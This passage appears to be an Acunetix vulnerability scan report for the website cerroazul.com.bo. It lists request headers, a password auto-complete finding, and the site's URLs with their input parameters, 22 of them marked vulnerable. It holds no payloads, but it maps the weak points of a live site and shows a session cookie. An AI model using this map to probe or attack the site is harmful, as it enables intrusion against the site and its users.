User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/minilistasfcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/minilistasfcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/spritefcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/spritefcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/css/spritefcl_class.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/spritefcl_class.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado_empresas.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /listado_empresas.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/www.facebook.com/BarracaCerroAzul
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /www.facebook.com/BarracaCerroAzul HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Password type input with auto-complete enabled

Severity Informational
Type Informational
Reported by module Crawler

Description
When a new name and password are entered in a form and the form is submitted, the browser asks whether the password
should be saved. Thereafter, when the form is displayed, the name and password are filled in automatically or are
completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser
cache.

Impact
Possible sensitive information disclosure
Recommendation
The password auto-complete should be disabled in sensitive applications.
To disable auto-complete, you may use code similar to:
<INPUT TYPE="password" AUTOCOMPLETE="off">

Affected items

/empresa.php
Details
Password type input named password from form with ID form-homepage-contact with action empresa.php has
autocomplete enabled.
Request headers
GET /empresa.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado.php
Details
Password type input named password from form with ID form-homepage-contact with action listado.php has
autocomplete enabled.
Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/privacidad.php
Details
Password type input named password from form with ID form-homepage-contact with action privacidad.php has
autocomplete enabled.
Request headers
GET /privacidad.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Password type input named password from form with ID form-homepage-contact with action sesion.php has
autocomplete enabled.
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Password type input named password from form with ID form-homepage-contact with action suscribirse.php has
autocomplete enabled.
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Scanned items (coverage report)
Scanned 126 URLs. Found 22 vulnerable.
URL: http://www.cerroazul.com.bo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common.php
Vulnerabilities has been identified for this URL
4 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Input scheme 2
Input name Input type
mensaje URL encoded GET
name URL encoded GET
phone URL encoded GET
URL: http://www.cerroazul.com.bo/listado_empresas.php
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/mapa.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
URL: http://www.cerroazul.com.bo/sesion.php
Vulnerabilities has been identified for this URL
6 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
phone URL encoded POST
Input scheme 2
Input name Input type
phone URL encoded POST
Input scheme 3
Input name Input type
password URL encoded POST
phone URL encoded POST
usuario URL encoded POST
URL: http://www.cerroazul.com.bo/about.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
URL: http://www.cerroazul.com.bo/index.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
URL: http://www.cerroazul.com.bo/contacto.php
Vulnerabilities has been identified for this URL
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Input scheme 2
Input name Input type
correo URL encoded GET
mensaje URL encoded GET
name URL encoded GET
phone URL encoded GET
URL: http://www.cerroazul.com.bo/comentario.php
Vulnerabilities has been identified for this URL
3 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Input scheme 2
Input name Input type
comentario URL encoded GET
name URL encoded GET
URL: http://www.cerroazul.com.bo/common/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/reset.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/boton.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/css/styles.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuUni.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/basefcl.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/spritefcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/base_header.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/nivo-slider.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/minilistasfcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/spritefcl_class.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/accordionmenu.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/minilistas_fcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/style.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/settings.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/css-family.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuuni.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/css/style2.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuicon.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/catalogo.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/listas_fcl.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/img
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/basic.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/galleriffic-3.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menu_acor.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/ie-css3.htc
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/empresas/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/thumb/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/banners/
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/images/images_menu/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/site
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/accordionmenu.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_index.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.pack.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.easing.1.3.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.cssAnimate.mini.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.touchwipe.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.mousewheel.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.themepunch.services.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/mapa.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gmaps.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/login.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.md5.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_contacto.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/comentario.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_cata.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/parametros.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/registrarse.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.history.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.galleriffic.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.opacityrollover.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_descripcion.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/js/actualizar_visita_cata.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_grupo.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/buscar.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/ubicaciones.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/search.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.all.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.theme.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.autocomplete.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.4.2.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.core.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.widget.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL

URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.position.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.autocomplete.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/site
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/site/common
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/imagenes
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/layout_miarroba
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/layout_miarroba/sprites
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/empresa/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/empresa/get_empresas.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_dpto URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/search/get-datos.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_dpto URL encoded GET
parametro URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/get_paginador2.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/search/get_datespag2.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
vf_param URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/catalogo/get_datos_descripcion.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_cata URL encoded GET
id_empre URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/actualizar_cata.php
No vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_cata URL encoded GET
id_empre URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/contacto/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/contacto/get-datos.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_empre URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/contacto/enviar_datos.php
No vulnerabilities has been identified for this URL
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
correo URL encoded GET
id_empre URL encoded GET
mensaje URL encoded GET
nombre URL encoded GET
telefono URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/comentario/get_datos.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id_empre URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/get-paginador.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/comentario/get-datespag.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
vf_param URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/insertar_come.php
No vulnerabilities has been identified for this URL
4 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
descripcion URL encoded GET
id_empre URL encoded GET
id_padre URL encoded GET
nombre URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
URL: http://www.cerroazul.com.bo/suscribirse.php
Vulnerabilities has been identified for this URL
6 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
txt_usuario URL encoded POST
Input scheme 2
Input name Input type
name URL encoded POST
password URL encoded POST
phone URL encoded POST
txt_nombre URL encoded POST
URL: http://www.cerroazul.com.bo/descripcion.php
No vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
id_cata URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo_grupo.php
Vulnerabilities has been identified for this URL
3 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
id_fami URL encoded GET
id_grupo URL encoded GET
URL: http://www.cerroazul.com.bo/www.facebook.com
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/www.facebook.com/BarracaCerroAzul
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/empresa.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
txt_usuario URL encoded POST
URL: http://www.cerroazul.com.bo/ubicacion.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/privacidad.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
txt_usuario URL encoded POST
URL: http://www.cerroazul.com.bo/listado.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
txt_nombre URL encoded POST
URL: http://www.cerroazul.com.bo/undefined
No vulnerabilities has been identified for this URL
No input(s) found for this URL
